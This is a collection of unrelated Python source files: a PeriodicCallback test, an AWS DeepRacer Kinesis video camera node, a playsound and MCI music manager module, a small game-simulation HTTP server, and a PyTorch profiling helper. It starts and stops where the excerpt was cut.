class TestPeriodicCallback(unittest.TestCase):
def setUp(self):
self.io_loop = FakeTimeIOLoop()
self.io_loop.make_current()
def tearDown(self):
self.io_loop.close()
def test_basic(self):
calls = []
def cb():
calls.append(self.io_loop.time())
pc = PeriodicCallback(cb, 10000)
pc.start()
self.io_loop.call_later(50, self.io_loop.stop)
self.io_loop.start()
self.assertEqual(calls, [1010, 1020, 1030, 1040, 1050])
def test_overrun(self):
sleep_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0]
expected = [
1010, 1020, 1030, # first 3 calls on schedule
1050, 1070, # next 2 delayed one cycle
1100, 1130, # next 2 delayed 2 cycles
1170, 1210, # next 2 delayed 3 cycles
1220, 1230, # then back on schedule.
]
calls = []
def cb():
calls.append(self.io_loop.time())
if not sleep_durations:
self.io_loop.stop()
return
self.io_loop.sleep(sleep_durations.pop(0))
pc = PeriodicCallback(cb, 10000)
pc.start()
self.io_loop.start()
self.assertEqual(calls, expected)
if __name__ == "__main__":
unittest.main()
|
kinesis_video_camera_node.py
|
#!/usr/bin/env python
##############################################################
# #
# Copyright 2019 Amazon.com, Inc. or its affiliates. #
# All Rights Reserved. #
# #
##############################################################
import sys
import time
import logging
from threading import Thread
import cv2
import rospy
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image as ROSImg
from markov.utils import DoubleBuffer, force_list, get_video_display_name, get_racecar_names
from markov.constants import DEFAULT_COLOR
from markov.log_handler.logger import Logger
from markov.log_handler.exception_handler import log_and_exit
from markov.log_handler.constants import (SIMAPP_EVENT_ERROR_CODE_500,
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION)
from markov.reset.constants import RaceType
from mp4_saving.constants import RaceCarColorToRGB
from mp4_saving.single_agent_image_editing import SingleAgentImageEditing
from mp4_saving.multi_agent_image_editing import MultiAgentImageEditing
from mp4_saving.training_image_editing import TrainingImageEditing
LOG = Logger(__name__, logging.INFO).get_logger()
CAMERA_FPS = 1.0 / 15.0  # period in seconds between published frames (15 fps)
class KinesisVideoCamera(object):
""" This node is used to produce frames for the AWS kinesis video stream and
for saving the mp4 and uploading to S3. Both are subscribed to the output of
the image topic produced by this node.
"""
def __init__(self, racecar_name, racecars_info):
self.racecar_name = racecar_name
self.racecars_info = racecars_info
# init cv bridge
self.bridge = CvBridge()
# Double buffer so that we can always publish to KVS, even if physics freezes
self.main_camera_frame_buffer = DoubleBuffer(clear_data_on_get=False)
main_camera_topic = "/{}/{}/zed/rgb/image_rect_color".format(racecar_name, "main_camera")
        # This is the topic that the camera object publishes to
rospy.Subscriber(main_camera_topic, ROSImg, self._main_camera_cb_)
# Create a publisher and new topic for kvs to subscribe to
self.kvs_pub = rospy.Publisher('/{}/deepracer/kvs_stream'.format(racecar_name), ROSImg, queue_size=1)
        # This determines what kind of image editing should be done based on the race type
self.job_type_image_edit = self._get_image_editing_job_type()
# Run the publisher on its own thread
Thread(target=self._publish_kvs_frames_).start()
def _get_image_editing_job_type(self):
""" This determines what kinding of image editing should be done based on the race type
Returns:
ImageEditingObj: Instantiating an object based on training/evaluation and racetype
"""
race_type = rospy.get_param("RACE_TYPE", RaceType.TIME_TRIAL.value)
is_training = rospy.get_param("JOB_TYPE") == 'TRAINING'
if is_training:
return TrainingImageEditing(self.racecars_info[0])
if race_type == RaceType.HEAD_TO_MODEL.value or race_type == RaceType.F1.value:
return MultiAgentImageEditing(self.racecar_name, self.racecars_info,
race_type)
if race_type in [RaceType.TIME_TRIAL.value, RaceType.OBJECT_AVOIDANCE.value,
RaceType.HEAD_TO_BOT.value]:
return SingleAgentImageEditing(self.racecars_info[0], race_type)
raise Exception("Unknown job type for image editing")
def _main_camera_cb_(self, frame):
        '''Callback for the frames being published by the main camera topic
        frame - Frame, of type Image, published by the main camera topic
'''
self.main_camera_frame_buffer.put(frame)
    def _overlay_two_images_(self, major_frame):
        # convert ros image message to cv image
        try:
            major_cv_image = self.bridge.imgmsg_to_cv2(major_frame, "bgr8")
        except CvBridgeError as ex:
            LOG.info("ROS image message to cv2 error: {}".format(ex))
            # Conversion failed, so fall back to publishing the unedited frame
            return major_frame
        major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2RGBA)
        # Edit the image based on the racecar type and job type
        major_cv_image = self.job_type_image_edit.edit_image(major_cv_image)
        # convert cv image back to ros image message
        try:
            overlay_frame = self.bridge.cv2_to_imgmsg(major_cv_image, "bgr8")
        except CvBridgeError as ex:
            LOG.info("cv2 to ROS image message error: {}".format(ex))
            return major_frame
        return overlay_frame
def _publish_kvs_frames_(self):
'''This method should be run in its own thread, its used to publish frames
to the kvs encoder
'''
while not rospy.is_shutdown():
main_camera_frame = self.main_camera_frame_buffer.get()
frame = self._overlay_two_images_(main_camera_frame)
time.sleep(CAMERA_FPS)
if not rospy.is_shutdown():
self.kvs_pub.publish(frame)
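# Note: DoubleBuffer (imported from markov.utils) is what lets the publisher thread
# keep emitting the most recent frame even if the camera callback stalls. A minimal
# sketch of that idea (illustrative only, not the markov.utils implementation, and
# assuming `import threading`) looks roughly like:
#
#   class LatestFrameBuffer(object):
#       def __init__(self, clear_data_on_get=True):
#           self._cv = threading.Condition()
#           self._data = None
#           self._clear = clear_data_on_get
#       def put(self, item):
#           with self._cv:
#               self._data = item
#               self._cv.notify_all()
#       def get(self):
#           with self._cv:
#               while self._data is None:
#                   self._cv.wait()
#               item = self._data
#               if self._clear:
#                   self._data = None
#               return item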
def get_racecars_info(racecar_names):
""" This function returns the agents information like name, car color, display name
Arguments:
        racecar_names (list): list of racecar names
Returns:
(list): Racecar information such as name, car color, display name
"""
racecars = racecar_names
racecars_info = list()
racecars_color = force_list(rospy.get_param("CAR_COLOR", DEFAULT_COLOR))
racecars_display_name = get_video_display_name()
for i, racecar_name in enumerate(racecars):
racecar_dict = dict()
racecar_dict['name'] = racecar_name
racecar_dict['racecar_color'] = RaceCarColorToRGB[racecars_color[i]].value
racecar_dict['display_name'] = racecars_display_name[i]
racecars_info.append(racecar_dict)
return racecars_info
def main(racecar_names):
""" Main function for kinesis_video_camera
Arguments:
        racecar_names (list): list of racecar names
"""
try:
racecars_info = get_racecars_info(racecar_names)
for racecar in racecars_info:
# Instantiate KinesisVideoCamera objects for each racecar
KinesisVideoCamera(racecar['name'], racecars_info)
except Exception as err_msg:
log_and_exit("Exception in Kinesis Video camera ros node: {}"
.format(err_msg),
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500)
if __name__ == '__main__':
    # number of racecars is passed as an argument to the node
rospy.init_node('kinesis_video_camera_node', anonymous=True)
RACER_NUM = int(sys.argv[1])
racecar_names = get_racecar_names(RACER_NUM)
main(racecar_names)
rospy.spin()
|
playsound.py
|
class PlaysoundException(Exception):
pass
def _playsoundWin(sound, block = True):
'''
Utilizes windll.winmm. Tested and known to work with MP3 and WAVE on
Windows 7 with Python 2.7. Probably works with more file formats.
Probably works on Windows XP thru Windows 10. Probably works with all
versions of Python.
Inspired by (but not copied from) Michael Gundlach <gundlach@gmail.com>'s mp3play:
https://github.com/michaelgundlach/mp3play
I never would have tried using windll.winmm without seeing his code.
'''
from ctypes import c_buffer, windll
from random import random
from time import sleep
from sys import getfilesystemencoding
def winCommand(*command):
buf = c_buffer(255)
command = ' '.join(command).encode(getfilesystemencoding())
errorCode = int(windll.winmm.mciSendStringA(command, buf, 254, 0))
if errorCode:
errorBuffer = c_buffer(255)
windll.winmm.mciGetErrorStringA(errorCode, errorBuffer, 254)
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command.decode() +
'\n ' + errorBuffer.value.decode())
raise PlaysoundException(exceptionMessage)
return buf.value
alias = 'playsound_' + str(random())
winCommand('open "' + sound + '" alias', alias)
winCommand('set', alias, 'time format milliseconds')
durationInMS = winCommand('status', alias, 'length')
winCommand('play', alias, 'from 0 to', durationInMS.decode())
if block:
sleep(float(durationInMS) / 1000.0)
def _playsoundOSX(sound, block = True):
'''
Utilizes AppKit.NSSound. Tested and known to work with MP3 and WAVE on
OS X 10.11 with Python 2.7. Probably works with anything QuickTime supports.
Probably works on OS X 10.5 and newer. Probably works with all versions of
Python.
Inspired by (but not copied from) Aaron's Stack Overflow answer here:
http://stackoverflow.com/a/34568298/901641
I never would have tried using AppKit.NSSound without seeing his code.
'''
from AppKit import NSSound
from Foundation import NSURL
from time import sleep
if '://' not in sound:
if not sound.startswith('/'):
from os import getcwd
sound = getcwd() + '/' + sound
sound = 'file://' + sound
url = NSURL.URLWithString_(sound)
nssound = NSSound.alloc().initWithContentsOfURL_byReference_(url, True)
if not nssound:
raise IOError('Unable to load sound named: ' + sound)
nssound.play()
if block:
sleep(nssound.duration())
def _playsoundNix(sound, block=True):
"""Play a sound using GStreamer.
Inspired by this:
https://gstreamer.freedesktop.org/documentation/tutorials/playback/playbin-usage.html
"""
if not block:
raise NotImplementedError(
"block=False cannot be used on this platform yet")
# pathname2url escapes non-URL-safe characters
import os
try:
from urllib.request import pathname2url
except ImportError:
# python 2
from urllib import pathname2url
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
playbin = Gst.ElementFactory.make('playbin', 'playbin')
if sound.startswith(('http://', 'https://')):
playbin.props.uri = sound
else:
playbin.props.uri = 'file://' + pathname2url(os.path.abspath(sound))
set_result = playbin.set_state(Gst.State.PLAYING)
if set_result != Gst.StateChangeReturn.ASYNC:
raise PlaysoundException(
"playbin.set_state returned " + repr(set_result))
# FIXME: use some other bus method than poll() with block=False
# https://lazka.github.io/pgi-docs/#Gst-1.0/classes/Bus.html
bus = playbin.get_bus()
bus.poll(Gst.MessageType.EOS, Gst.CLOCK_TIME_NONE)
playbin.set_state(Gst.State.NULL)
from platform import system
system = system()
if system == 'Windows':
playsound = _playsoundWin
elif system == 'Darwin':
playsound = _playsoundOSX
else:
playsound = _playsoundNix
del system
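# Basic use of the selected backend (the file name is hypothetical; block=True is
# the default and sleeps for roughly the duration of the clip):
#
#   playsound('alert.wav')
#   playsound('alert.wav', block=False)  # the GStreamer backend raises NotImplementedError for this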
from ctypes import c_buffer, windll
from random import random
from time import sleep
from sys import getfilesystemencoding
def winCommand(*command):
buf = c_buffer(255)
command = ' '.join(command).encode(getfilesystemencoding())
errorCode = int(windll.winmm.mciSendStringA(command, buf, 254, 0))
if errorCode:
errorBuffer = c_buffer(255)
windll.winmm.mciGetErrorStringA(errorCode, errorBuffer, 254)
exceptionMessage = ('\n Error ' + str(errorCode) + ' for command:'
'\n ' + command.decode() +
'\n ' + errorBuffer.value.decode())
raise PlaysoundException(exceptionMessage)
return buf.value
from threading import Thread,Event,Lock
from queue import Queue,Empty
from collections import deque
'''
music class which uses windows mci to play the music
'''
class _music(object):
__alias=None
__running_idx=None
__sound=None
__start=None
__end=None
__is_repeat=False
__id=-1
music_list=None
'''
initialize the music object
'''
def __init__(self,sound,id):
self.__alias=['','']
self.__running_idx=0
self.__id=id
self.preload(sound)
def set_music_list(self,music_list):
self.music_list = music_list
def __eq__(self,value):
return self.__id==value
'''
clear the music object
music will be closed
'''
def close(self):
self.stop()
self.__clear()
'''
get id of music
music will not be affected
'''
def get_id(self):
return self.__id
'''
    return whether the music plays repeatedly
music will not be affected
'''
def is_repeat(self):
return self.__is_repeat
'''
return the range from start to end
music will not be affected
'''
def length(self):
if self.__check_alias():
return self.__end-self.__start
'''
return the mode of the music object
music will not be affected
'''
def mode(self):
if self.__check_alias():
return winCommand('status',self.__get_alias(),'mode').decode()
'''
pause the music
music will be paused
'''
def pause(self):
if self.__check_alias():
winCommand('pause '+self.__get_alias())
'''
play the music from start to end
music will be playing
'''
def play(self,start=0,end=-1):
self.__start,self.__end=self.__parse_start_end(start,end,self.total_length())
self.__play_implement(self.__start,self.__end)
'''
return the position of the music
music will not be affected
'''
def position(self):
if self.__check_alias():
return int(winCommand('status',self.__get_alias(),'position').decode())
'''
preload the music information
'''
def preload(self,sound):
self.__sound=sound
for i in range(2):
self.__alias[i]='playsound_'+str(random())
winCommand('open "'+self.__sound+'" alias',self.__alias[i])
winCommand('set',self.__alias[i],'time format milliseconds')
length=self.total_length()
self.__start=0
self.__end=length
return length
'''
resume playing
music will be playing
'''
def resume(self):
if self.__check_alias():
if self.__is_repeat:
self.__play_implement(self.position(),self.__end)
else:
winCommand('resume '+self.__get_alias())
'''
seek the music to pos.
    music will be paused
'''
def seek(self,pos):
if self.__check_alias():
if pos>self.__end or pos<self.__start:
raise PlaysoundException('position exceed range')
winCommand('seek',self.__get_alias(),'to',str(pos))
winCommand('play',self.__get_alias(),'from '+ str(pos) +' to',str(self.__end))
self.pause()
'''
set repeat flag of the music
    music will play repeatedly
'''
def set_repeat(self,repeat):
self.__is_repeat=repeat
'''
set id for music object
music will not be affected
'''
def set_id(self,id):
self.__id=id
'''
stop the music.
music will be stopped
'''
def stop(self):
if self.__check_alias():
self.seek(self.__start)
winCommand('stop '+self.__get_alias())
'''
    total length of the music object; unlike length(), which only covers the range from
    start to end, total_length covers the whole file
music will not be affected
'''
def total_length(self):
if self.__check_alias():
return int(winCommand('status',self.__get_alias(),'length').decode())
'''
    update the playback state of the music; when the repeat flag is set and the end is near, restart playback
'''
def update_mode(self,delay=0):
mod = self.mode()
if mod =='playing':
#if self.__end-self.position()<delay then repeat the music
if self.__is_repeat==True:
if self.__end-self.position()<=delay:
self.__running_idx=(self.__running_idx+1)%2
self.__play_implement(self.__start,self.__end)
return mod
def __get_alias(self):
return self.__alias[self.__running_idx]
def __check_alias(self):
if self.__get_alias()!='':
return True
def __parse_start_end(self,start,end,length):
if not (isinstance(start,int) and isinstance(end,int)):
raise PlaysoundException('start and end must be int')
_start=0
_end=0
if end==-1:
_end = length
elif end<=length:
_end = end
else:
raise PlaysoundException('music range exceed limits')
if start<0 or start>length:
raise PlaysoundException('music range exceed limits')
elif _end<start:
raise PlaysoundException('end must be bigger than start')
else:
_start=start
return _start,_end
def __del__(self):
self.__clear()
def __clear(self):
if self.__check_alias():
for i in range(2):
winCommand('close '+self.__alias[i])
self.__alias=['','']
self.__start=None
self.__end=None
self.__is_repeat=False
def __play_implement(self,start,end):
winCommand('play',self.__get_alias(),'from '+ str(start) +' to',str(end))
def print(self):
if self.__check_alias():
def format_miliseconds(t):
return '%d:%d:%d.%d'%(t//3600000,(t%3600000)//60000,(t%60000)//1000,t%1000)
print('music name:',self.__sound)
print('mode:',self.mode())
print('total_length:',self.total_length())
print('position:',str(self.position()))
print('start - end: {} - {}'.format(format_miliseconds(self.__start),format_miliseconds(self.__end)))
'''
singleton
'''
class _singleton(object):
_mutex=Lock()
def __init__(self):
pass
@classmethod
def GetInstance(cls,*args,**kwargs):
if not hasattr(cls,'_instance'):
cls._mutex.acquire()
if not hasattr(cls,'_instance'):
cls._instance = cls()
print('create instance',cls._instance)
cls._mutex.release()
return cls._instance
'''
music tag is used to send message for music manager
'''
class _music_tag(object):
id=-1 #id is the connection between music player and _music object
operator='' #operator of _music object
args=None #parameters
block_event=None
block=False
retval=None #return value for some methods of music player
music_list=None #special deal with music list
def __init__(self,id,operator,block=False,*args):
self.id=id
self.operator = operator
self.args = args
if block:
self.block_event=Event()
self.block=True
def set_music_list(self,music_list):
self.music_list = music_list
'''
music player is the client who sends music tags to music manager which indeed plays music.
music player controls music once you open the music.
'''
class music_player(object):
__id=-1 #identity of every _music object
__music=None #sound
static_id=0 #static variables
mutex=Lock() #lock of static_id
music_list=None #this music player belong to which music list
def __init__(self,music_list=None):
'''
if music player belongs to one of music list,then set music_list,
otherwise you can ignore music_list parameter
'''
self.music_list = music_list
def get_music(self):
'''
get name of sound
'''
return self.__music
def close(self):
'''
close sound
'''
self.__send('close',False)
self.__id=-1
def length(self):
'''
get the length of music.
        @warning: this method blocks the current thread until the music manager responds
'''
return self.__send('length',True)
def mode(self):
'''
get the mode of music.
        @warning: this method blocks the current thread until the music manager responds
'''
return self.__send('mode',True)
def open(self,music):
'''
open the music
'''
self.__music=music
self.mutex.acquire()
self.__id=music_player.static_id
music_player.static_id=music_player.static_id+1
self.mutex.release()
self.__send('open',False,self.__music,self.__id)
def pause(self):
'''
pause the music
'''
self.__send('pause',False)
def play(self,start=0,end=-1):
'''
play the music
'''
self.__send('play',False,start,end)
def position(self):
'''
get the mode of music.
        @warning: this method blocks the current thread until the music manager responds
'''
return self.__send('position',True)
def resume(self):
'''
resume the music
'''
self.__send('resume',False)
def seek(self,pos):
'''
        seek the music to pos, which is defined in milliseconds
'''
self.__send('seek',False,pos)
def set_repeat(self,repeat):
'''
        play the music repeatedly
'''
self.__send('set_repeat',False,repeat)
def stop(self):
'''
stop the music
'''
self.__send('stop',False)
def total_length(self):
'''
get the total length of music.
        @warning: this method blocks the current thread until the music manager responds
'''
return self.__send('total_length',True)
def __send(self,operator,block,*args):
'''
send music tag to music manager
'''
if self.__id==-1:
raise PlaysoundException('No music has been opened')
tag=_music_tag(self.__id,operator,block,*args)
tag.music_list=self.music_list
return music_manager.GetInstance().put_tag(tag)
class music_list(object):
__music_list=deque()
def append_music(self,sound,repeat=False):
music = music_player(self)
music.open(sound)
music.set_repeat(repeat)
self.__music_list.append(music)
if len(self.__music_list)==1:
self.top().play()
def play_next(self):
if len(self.__music_list)>=2:
self.__music_list[1].play()
self.__music_list.popleft().close()
def pause_music(self):
if len(self.__music_list)>0 and self.mode()=='playing':
self.top().pause()
def resume_music(self):
if len(self.__music_list)>0 and self.mode()=='paused':
self.top().resume()
def mode(self):
return self.top().mode()
def top(self):
return self.__music_list[0]
class music_manager(_singleton):
__mutex=Lock()
__sounds=[]
# __music_list=[]
__tag_queue=Queue()
__running_event=Event()
__end_running_event=Event()
def __init__(self):
self.reset_event()
def reset_event(self):
self.__running_event.set()
self.__end_running_event.clear()
def put_tag(self,tag):
'''
push a music tag to music_manager
        @warning: if tag.block is True, this method blocks the current thread until the music manager responds
'''
if tag.block:
tag.block_event.clear()
self.__tag_queue.put(tag)
if tag.block:
tag.block_event.wait()
return tag.retval
def get_tag(self):
try:
            # if no sounds are loaded, block on the queue so the manager thread sleeps;
            # otherwise poll for a tag without blocking
if len(self.__sounds)>0:
tag=self.__tag_queue.get_nowait()
else:
tag=self.__tag_queue.get()
retval=None
if tag.operator == 'open':
m=self.__add_music(*tag.args)
m.set_music_list(tag.music_list)
elif tag.operator == 'close':
#remove the music from self.__sounds
self.__rm_music(tag.id)
else:
(idx,item)=self.__get_music_idx_and_item(tag.id)
#reflect
retval=getattr(item,tag.operator)(*tag.args)
#set return values in tag
if tag.block==True:
tag.retval=retval
tag.block_event.set()
except Empty:
pass
def __add_music(self,sound,id):
m=_music(sound,id)
self.__mutex.acquire()
self.__sounds.append(m)
self.__mutex.release()
return m
def __rm_music(self,id):
idx,rm_item=self.__get_music_idx_and_item(id)
rm_item.close()
rm_item.set_id(-1)
self.__mutex.acquire()
self.__sounds.pop(idx)
self.__mutex.release()
def __get_music_idx_and_item(self,id):
for i,x in enumerate(self.__sounds):
if x.get_id()==id:
return i,x
        raise PlaysoundException('No music object found with the given id')
@classmethod
def start(cls):
'''
start the music manager
'''
Thread(target=music_manager._start_music_manager_impl).start()
@classmethod
def stop(cls):
'''
stop the music manager
'''
manager = cls.GetInstance()
manager.__running_event.clear()
manager.__end_running_event.wait()
manager.reset_event()
print('stop manager',manager)
'''
main loop of music manager
'''
@classmethod
def _start_music_manager_impl(cls):
manager = cls.GetInstance()
print('start manager',manager)
delay=100
while(manager.__running_event.isSet()):
for m in manager.__sounds:
mode = m.update_mode(delay)
#callback the music_list
if m.music_list!=None and mode=='playing' and not m.is_repeat():
pos = m.position()
total_length=m.total_length()
if total_length-pos<=delay:
m.music_list.play_next()
manager.get_tag()
for x in manager.__sounds:
x.close()
manager.__end_running_event.set()
music_manager.start()
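# A minimal usage sketch (Windows only, since _music drives winmm/MCI through
# winCommand; the file name is hypothetical). The manager thread is already
# started by the call above:
#
#   player = music_player()
#   player.open('example.mp3')   # registers the sound with the manager
#   player.set_repeat(True)
#   player.play()                # play the whole file
#   print(player.mode())         # blocking query answered by the manager thread
#   player.close()
#   music_manager.stop()         # stop the manager loop when done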
|
server.py
|
import http.server
import threading
import socket
import tdl
import hunting.level.parser as parser
import hunting.level.encoder as encoder
from hunting.display.render import Renderer
import hunting.sim.runner as runner
import hunting.resources as resources
UTF_8 = 'utf-8'
def get_random_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
return port
def shutdown_server_from_new_thread(server):
def kill_server():
server.shutdown()
killer = threading.Thread(target=kill_server)
killer.start()
class HelloWorldHandler(http.server.BaseHTTPRequestHandler):
def hello_world(self):
self.send_response(200)
self.send_header('content-type', 'text/plain')
self.end_headers()
payload = bytes('Hello World!', UTF_8)
self.wfile.write(payload)
def goodbye(self):
self.send_response(200)
self.end_headers()
self.wfile.write(bytes('Shutting down!\n', UTF_8))
shutdown_server_from_new_thread(self.server)
def what(self):
self.send_response(200)
self.end_headers()
self.wfile.write(bytes("I don't know what that is!", UTF_8))
def test_vis(self, file_path):
full_path = resources.get_full_path(file_path)
level = parser.parse_level(full_path)
runner.run_level(level)
main_console = tdl.init(level.width, level.height, 'TDL Test')
scratch_level = parser.parse_level(full_path)
renderer = Renderer(main_console, level.width, level.height)
renderer.render_all(level=scratch_level)
for event in level.log.events:
renderer.render_event(level=scratch_level, event=event)
main_console.__del__() # Crude, but this whole thing is crude.
self.send_response(200)
self.end_headers()
self.wfile.write(bytes(encoder.encode_level(level), UTF_8))
def run_file(self, file_path):
full_path = resources.get_full_path(file_path)
if full_path is not None:
try:
level = parser.parse_level(full_path)
runner.run_level(level)
self.send_response(200)
self.send_header('content-type', 'application/json')
self.end_headers()
self.wfile.write(bytes(encoder.encode_level(level), UTF_8))
except ValueError as err:
self.send_response(500)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('Error: {0}'.format(err), UTF_8))
else:
self.send_response(404)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('No such file!', UTF_8))
def do_GET(self):
if self.path == '/goodbye':
self.goodbye()
elif self.path == '/hello':
self.hello_world()
elif self.path.startswith('/test_vis/'):
self.test_vis(self.path[10:])
elif self.path.startswith('/run/'):
self.run_file(self.path[5:])
else:
self.what()
def new_server(port):
return http.server.HTTPServer(("", port), HelloWorldHandler)
def start_server(port=8888):
print('starting on port', port)
httpd = new_server(port)
httpd.serve_forever()
print('server shut down')
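# Hedged usage sketch (added for illustration, not part of the original module): the helper
# below starts the server on a random open port in a daemon thread, fetches /hello, then
# /goodbye so the server shuts itself down.
def _example_run():
    import threading
    import time
    import urllib.request
    port = get_random_open_port()
    t = threading.Thread(target=start_server, args=(port,), daemon=True)
    t.start()
    time.sleep(0.5)  # give serve_forever() a moment to come up
    print(urllib.request.urlopen('http://localhost:{0}/hello'.format(port)).read())
    urllib.request.urlopen('http://localhost:{0}/goodbye'.format(port))
    t.join()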
|
performance.py
|
"""This will have the code that monitors performance and have some optimization codes
- Use Pytorch data loader with pinned memory (pin_memory) to see if you gain any performance increase.
You might not notice significant improvements since the dataset is small.
- Build in cython:
from Cython.Build import cythonize
setup(
ext_modules = cythonize("extensions.pyx")
)
- Once the unit tests pass and the functions are known to work, add a timeit wrapper to time them,
plus a logger wrapper that saves those timings to an Excel file for later use.
- Timing calls could be added to train, eval and interpret and the results saved to a log. The logging
can live in a standalone function, but the timing has to be written inside each function, which
clutters the code; ideally a single helper here would drive both.
"""
import cProfile as profiles
import inspect
import linecache
import os
import pstats
import sys
import time
import tracemalloc
from datetime import datetime
from queue import Queue, Empty
from threading import Thread
import psutil
if __name__ == '__main__' and __package__ is None:
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
__package__ = "pytorch_unet.trainer"
from pytorch_unet.trainer.train import main
from pytorch_unet.utils.helpers import elapsed_since, format_bytes
def profile_time(function, *args, **kwargs):
"""Profiles ncall, tottime percall cumtime and percall for the top 20 slow parts of the program.
Note:
_run wraps the call to the target function and is registered on the __main__ module as
__profile_run__ so cProfile can execute it by name. func_id is the function's name, used as a
temporary stats file: cProfile writes to it, pstats reads it back, the stats are dumped to
profile_time.dmp, and a readable top-20 listing sorted by time is written to profile_time.log.
:param function : Pass in the function to be time profiled.
:return (string) : Timing profile.
"""
def _run():
function(*args, **kwargs)
sys.modules['__main__'].__profile_run__ = _run
func_id = function.__name__ + '()'
profiles.run('__profile_run__()', func_id)
p = pstats.Stats(func_id)
p.stream = open(func_id, 'w')
p.dump_stats('./profile_time.dmp')
p.stream.close()
s = open(func_id).read()
os.remove(func_id)
out_stream = open('./profile_time.log', 'w')
ps = pstats.Stats('./profile_time.dmp', stream=out_stream)
ps.strip_dirs().sort_stats('time').print_stats(20)
print("Time Profiling Complete!")
return s
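# Hedged usage sketch (illustrative only; `slow_sum` is a made-up function): profile_time runs
# the callable under cProfile, writes ./profile_time.dmp and ./profile_time.log, and returns the
# raw stats text.
def _profile_time_example():
    def slow_sum(n):
        return sum(i * i for i in range(n))
    stats_text = profile_time(slow_sum, 100000)
    print(stats_text.splitlines()[0] if stats_text else stats_text)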
def get_process_memory():
"""Function to get process memory using psutil.
Note:
os.getpid is used to get the process identification number (the number automatically assigned
to each process). Then memory_info gets a bunch of memory information.
:return:
RSS (Resident Set Size) : the non-swapped physical memory a process has used.
VMS (Virtual Memory Size) : the total amount of virtual memory used.
num_page_faults : the number of page faults (note: callers below label this value as shared memory).
"""
process = psutil.Process(os.getpid())
mi = process.memory_info()
return mi.rss, mi.vms, mi.num_page_faults
def display_top(snapshot, key_type='lineno', limit=20):
"""Function to display the top traces.
Note:
Frames from <frozen importlib._bootstrap> and <unknown> files are filtered out and the statistics
are grouped by line number. We then enumerate top_stats and, for each of the top `limit` traces,
print the filename, line number, allocated size and the source line itself.
Based on: https://pytracemalloc.readthedocs.io/examples.html.
:param snapshot : A snapshot of traces. In this case the Max RSS.
:param key_type : Group by the line number, defaults to 'lineno'.
:param limit (int) : Number of profiles to monitor, defaults to 20.
"""
snapshot = snapshot.filter_traces((
tracemalloc.Filter(False, "<frozen importlib._bootstrap>"),
tracemalloc.Filter(False, "<unknown>"),
))
top_stats = snapshot.statistics(key_type)
print("Top {} lines".format(limit))
for index, stat in enumerate(top_stats[:limit], 1):
frame = stat.traceback[0]
filename = os.sep.join(frame.filename.split(os.sep)[-2:])
line = linecache.getline(frame.filename, frame.lineno).strip()
print("#{:3d}: {:23s} | LineNo: {:>4} | RSS: {:>8} | LINE: {:>8}".format(index, filename, frame.lineno,
format_bytes(stat.size), line))
other = top_stats[limit:]
if other:
size = sum(stat.size for stat in other)
print("{} other calls: {}".format(len(other), format_bytes(size)))
total = sum(stat.size for stat in top_stats)
print("Total allocated size: {}".format(format_bytes(total)))
def memory_monitor(command_queue: Queue, poll_interval=1):
"""Function to start the memory monitoring thread.
Note:
Starts a tracemalloc trace with old_max = 0 and snapshot = None, then loops trying to remove an item
from the queue, blocking for at most poll_interval seconds. If nothing arrives in that time, queue
raises Empty and the except branch runs: get_process_memory reads the current RSS and, if it is a new
maximum, tracemalloc.take_snapshot() captures a snapshot. When an item does arrive, the last snapshot
is printed via display_top and the thread returns.
:param command_queue : Queue used to signal the monitor to stop.
:param poll_interval : Polling interval in seconds (the caller passes 0.1; defaults to 1).
"""
tracemalloc.start()
old_max = 0
snapshot = None
while True:
try:
command_queue.get(timeout=poll_interval)
if snapshot is not None:
print(datetime.now())
display_top(snapshot)
return
except Empty:
max_rss, _, _ = get_process_memory()
if max_rss > old_max:
old_max = max_rss
snapshot = tracemalloc.take_snapshot()
def profile_memory(function, *args, **kwargs):
"""Profiles RSS Memory primarily and also prints our the VMS and Shared Memory.
Note:
get_process_memory is called to record the RSS, VMS and shared memory before the run. A FIFO Queue is
created, poll_interval is set to 0.1, and both are passed to memory_monitor, which runs in a separate
Thread that monitors memory while the function executes. Note that CPython threads do not run in
parallel because of the GIL (global interpreter lock), which keeps memory management thread-safe, so
the measured values are only approximate. The function is then timed: the elapsed time and the
after-run RSS, VMS and shared memory are measured, 'stop' is put on the queue, and the monitor
thread is joined.
:param function : Pass in the function to be memory profiled.
:return : Memory Profile.
"""
def wrapper(*args, **kwargs):
rss_before, vms_before, shared_before = get_process_memory()
queue = Queue()
poll_interval = 0.1
monitor_thread = Thread(target=memory_monitor, args=(queue, poll_interval))
monitor_thread.start()
start = time.time()
result = function(*args, **kwargs)
elapsed_time = elapsed_since(start)
rss_after, vms_after, shared_after = get_process_memory()
queue.put('stop')
monitor_thread.join()
print("Profiling: {:>20} RSS: {:>8} | VMS: {:>8} | SHR {:>8} | time: {:>8}".format(
"<" + function.__name__ + ">",
format_bytes(rss_after - rss_before),
format_bytes(vms_after - vms_before),
format_bytes(shared_after - shared_before),
elapsed_time))
return result
print("Memory Profiling Complete!")
if inspect.isfunction(function):
return wrapper
elif inspect.ismethod(function):
return wrapper(*args, **kwargs)
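# Hedged usage sketch (illustrative only; `allocate` is a made-up function): wrapping it with
# profile_memory returns a wrapper that starts the background memory_monitor thread, runs the
# function, then prints the RSS/VMS/shared deltas and the elapsed time.
def _profile_memory_example():
    def allocate():
        return [bytearray(1024) for _ in range(10000)]
    profiled = profile_memory(allocate)  # plain functions get the wrapper back
    return profiled()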
def start_monitoring(args):
if args.profile_type == 'time':
profile_time(main)
elif args.profile_type == 'memory':
run_profiling = profile_memory(main)
run_profiling()
|
LDSUtilities.py
|
# -*- coding: utf-8 -*-
'''
v.0.0.9
LDSReplicate - LDSUtilities
Copyright 2011 Crown copyright (c)
Land Information New Zealand and the New Zealand Government.
All rights reserved
This program is released under the terms of the new BSD license. See the
LICENSE file for more information.
Simple LDS specific utilities class
